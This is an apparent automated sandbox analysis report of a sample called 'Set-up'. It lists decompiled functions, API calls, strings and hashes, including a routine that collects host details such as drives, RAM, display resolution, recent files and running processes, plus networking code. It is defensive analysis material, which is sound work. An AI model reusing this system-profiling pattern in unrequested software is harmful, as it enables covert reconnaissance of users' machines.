Opcode ID: dcb4a236ee07737f6a85472a8a3d878a6f62c8f5b2035b23c6383b959d76f780
Instruction ID: 78e80e09c0849d299dd8e8c9d26ad08aeca0f2f218807bdd69c16d9e36cfb8a5
Opcode Fuzzy Hash: dcb4a236ee07737f6a85472a8a3d878a6f62c8f5b2035b23c6383b959d76f780
Instruction Fuzzy Hash: 98E1B6B49053099FCB14EFA8D9847AEBBF4EB84304F50886DE888D7354E7749998CF52

Function 00DC255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00DC2579

Part of subcall function 0126B130: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00DC2589), ref: 0126B145

GlobalMemoryStatusEx.KERNELBASE ref: 00DC25CC
GetLogicalDriveStringsA.KERNEL32 ref: 00DC2619
GetDriveTypeA.KERNELBASE ref: 00DC2647
GetDiskFreeSpaceExA.KERNELBASE ref: 00DC267E
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC2749
KiUserCallbackDispatcher.NTDLL ref: 00DC27E2
SHGetKnownFolderPath.SHELL32 ref: 00DC286D
wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC28BE
wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC28D4
FindFirstFileW.KERNELBASE ref: 00DC28F8
FindNextFileW.KERNELBASE ref: 00DC291F
K32EnumProcesses.KERNEL32 ref: 00DC296F

Strings

`, xrefs: 00DC29BC
resolution_x, xrefs: 00DC280D
processes, xrefs: 00DC2996
recent_files, xrefs: 00DC2941
@, xrefs: 00DC25B4
free, xrefs: 00DC271E
drivers, xrefs: 00DC2769
name, xrefs: 00DC26A2
Num_displays, xrefs: 00DC27C3
Num_processor, xrefs: 00DC258D
uptime_minutes, xrefs: 00DC29E4
Num_ram, xrefs: 00DC25F0
all, xrefs: 00DC26E0
resolution_y, xrefs: 00DC282F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
API String ID: 2116500361-3337672980
Opcode ID: 8d00782d09865ee27fb13c81a25435ffba34ff1c4e4c7f78150daa002e571f38
Instruction ID: 5f301561d4eb3ab118f0b1cbd103c114477a2ffefbab20fa5cd0f9f89dba0735
Opcode Fuzzy Hash: 8d00782d09865ee27fb13c81a25435ffba34ff1c4e4c7f78150daa002e571f38
Instruction Fuzzy Hash: 78D193B4A157099FCB10EFA8C5846AEBBF4EF48304F40896DE898D7354E7349A94CF52

Function 00E8AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

htons.WS2_32(?), ref: 00E8AAE8
htons.WS2_32(?), ref: 00E8AB33
socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E8AB9A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E8ABE3
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00E8AC02
setsockopt.WS2_32(?,0000FFFF,00001002,00000000,00000004), ref: 00E8AC29
htonl.WS2_32(00000000), ref: 00E8AC69
bind.WS2_32(?,00000017,0000001C), ref: 00E8ACCF
setsockopt.WS2_32(?,00000029,0000001B,0000001C,00000004), ref: 00E8ACFE
setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 00E8AD20
WSAGetLastError.WS2_32 ref: 00E8ADB5
closesocket.WS2_32(?), ref: 00E8AE6F

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: setsockopt$htons$ErrorLastbindclosesockethtonlioctlsocketsocket
String ID:
API String ID: 4039825230-0
Opcode ID: 9abc8576d2c2f0d91578641060747a4640a19046bbeb0c8da20af29cf6e9c59d
Instruction ID: c40d87c930c6e17c5f2f5cfdac58c20ebd113917f2a434813f22b8e5f1173401
Opcode Fuzzy Hash: 9abc8576d2c2f0d91578641060747a4640a19046bbeb0c8da20af29cf6e9c59d
Instruction Fuzzy Hash: 2AE1B0706003019FE7209F64C844B6AB7E5FF88318F185A3EF99DAB291E775D894CB52

Function 00DC116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00DC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00DC1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC1344
GetStartupInfoA.KERNEL32 ref: 00DC1433

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 3873122205-0
Opcode ID: b1d028341285abfa0db9a95f8807f10782b2f5c17413d7bc45cd6fc2980ee6b5
Instruction ID: 6cf2856e64191860e38ade3a5e0281cb5d59dc5fbb87b6af0cb1a0c0752c5ffa
Opcode Fuzzy Hash: b1d028341285abfa0db9a95f8807f10782b2f5c17413d7bc45cd6fc2980ee6b5
Instruction Fuzzy Hash: D981C4B99043268FDB24EFA4D080B6EB7F0FB46308F18452CD9858B355D735D855CBA2

Function 01148E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 01148EAD
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 01148EFA
_write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01148F4A
_close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 01148F59

Strings

CONOUT$, xrefs: 01148EA6
@, xrefs: 01272A21
terminated, xrefs: 01148F20

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 8523f1a3594ff57be555f2e671d4c212fe2535c06518a142037bebc0fb1445ff
Instruction ID: 391c7f2f055beeb58626e4edd3293fa12244da603ca89c5e4396ddb378b82011
Opcode Fuzzy Hash: 8523f1a3594ff57be555f2e671d4c212fe2535c06518a142037bebc0fb1445ff
Instruction Fuzzy Hash: 4F4146B09142068FEB24EFB9C44466EBBE4EB88718F008A2DE998D7394E734C445CB56

Function 01268E70 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

error CryptGenRandom 0x%08lx, xrefs: 01268FE9

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: error CryptGenRandom 0x%08lx
API String ID: 0-1222942552
Opcode ID: 5a4a738fd922276a86a6066c1da5fc98e7a2fa20cdbeed73ae0f88c0099d81c2
Instruction ID: 9a182f28513d1bab6dfd9c5f966f03218b028b4e596efc3d60fb889ef3c39bd6
Opcode Fuzzy Hash: 5a4a738fd922276a86a6066c1da5fc98e7a2fa20cdbeed73ae0f88c0099d81c2
Instruction Fuzzy Hash: CD41C2B59093019FD700EFB8D58861EBBE4AB98315F408E2DE998C7368E774C5988F43

Function 00DD05B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,8508C483,?), ref: 00DD0711
getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00DD0783
WSAWaitForMultipleEvents.WS2_32(00000001,00DC3EBE,00000000,00000000,00000000), ref: 00DD086F
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00DD08EF
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00DD0934
WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00DD09DC
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00DD09FB
WSAResetEvent.WS2_32(8508C483), ref: 00DD0A1F

Strings

multi.c, xrefs: 00DD07B2

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
String ID: multi.c
API String ID: 3264668090-214371023
Opcode ID: 74a1d165ac7a2232b50fb2383c1aeee165334924455b0dc46034c7fc7d991112
Instruction ID: 49e1f24b0475c45e557ac79b4462a7e242655527d91003d40d9bd1e2bdc24ab7
Opcode Fuzzy Hash: 74a1d165ac7a2232b50fb2383c1aeee165334924455b0dc46034c7fc7d991112
Instruction Fuzzy Hash: 18D19D71608301AFE710DF64C881B6A7BE9FFD4304F08482EF98586352E775E959DBA2

Function 00DD6FA0 Relevance: 13.8, APIs: 9, Instructions: 255sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 00DD7010

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b3b4ac8b481950277c9c717873b0046f67b910bf0144cf82628920858c0f66ca
Instruction ID: 50b6abac0e923e7123a83b09037d926fba0eccb3318d3604227bbb081f8b5b43
Opcode Fuzzy Hash: b3b4ac8b481950277c9c717873b0046f67b910bf0144cf82628920858c0f66ca
Instruction Fuzzy Hash: 6C91F33060C3454BD7358B68C8847BAB6E5EFD4364F188B6EE8A9423D4F7719C50D6A1

Function 00DC11A3 Relevance: 12.1, APIs: 8, Instructions: 115sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00DC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00DC1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC1344
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC140C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 1209083157-0
Opcode ID: 3553b94a361e63dc1facddc0edace68f54a83eb6fc87b95327b889883ea10aa6
Instruction ID: b5e3588245c3fb5ba62bf085169f8b65049413b2015c5f49aa029571e089d222
Opcode Fuzzy Hash: 3553b94a361e63dc1facddc0edace68f54a83eb6fc87b95327b889883ea10aa6
Instruction Fuzzy Hash: 9B416BB4A043168FDB24EFA4D080B5EBBF0FB5A308F14452DD8899B315D7309855CFA2

Function 00DC13C9 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00DC1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC1344

Part of subcall function 01148A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00DC13EF), ref: 01148A2A

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC140C

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
String ID:
API String ID: 2715571461-0
Opcode ID: 191373917cd0d825e82aabc7586e82d1924034afd8943b301bafa3b84fba23ad
Instruction ID: d7b2f1b3084a3d97ca0bf990a238b757f4c5e1bada065ab9b4d6c57d48f7fdfc
Opcode Fuzzy Hash: 191373917cd0d825e82aabc7586e82d1924034afd8943b301bafa3b84fba23ad
Instruction Fuzzy Hash: 844169B89093168FDB28EFA4D080B6EBBF0FB5A308F14492DD9889B315D7349855CF52

Function 00E8B180 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 320COMMON

Download Yara Rule

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00E8B2B6
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(cur != NULL,ares__sortaddrinfo.c,000001A4,?,?,00000000,0000000B,?,?,00E73C41,00000000), ref: 00E8B3F7

Strings

cur != NULL, xrefs: 00E8B3F2
ares__sortaddrinfo.c, xrefs: 00E8B3ED

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assertgetsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 1186336949-2430778319
Opcode ID: add90c0ea11f2c06842f5b60cbc96cb87bb56dba9c1edffe8597136db1e91e66
Instruction ID: 48e57a470acc7bd461479b1233ffe951c70fc17726a5cc7c00406dc6d9bde349
Opcode Fuzzy Hash: add90c0ea11f2c06842f5b60cbc96cb87bb56dba9c1edffe8597136db1e91e66
Instruction Fuzzy Hash: EBC17F716043059FD718EF24C881A6AB7E2FF88318F15956CE84DAB3A2E771ED45CB81

Function 00DC1160 Relevance: 10.6, APIs: 7, Instructions: 131sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00DC11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00DC1238
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC124D
__p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC1261
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC12EB
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC1323
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00DC132E
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC1344
GetStartupInfoA.KERNEL32 ref: 00DC1433

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
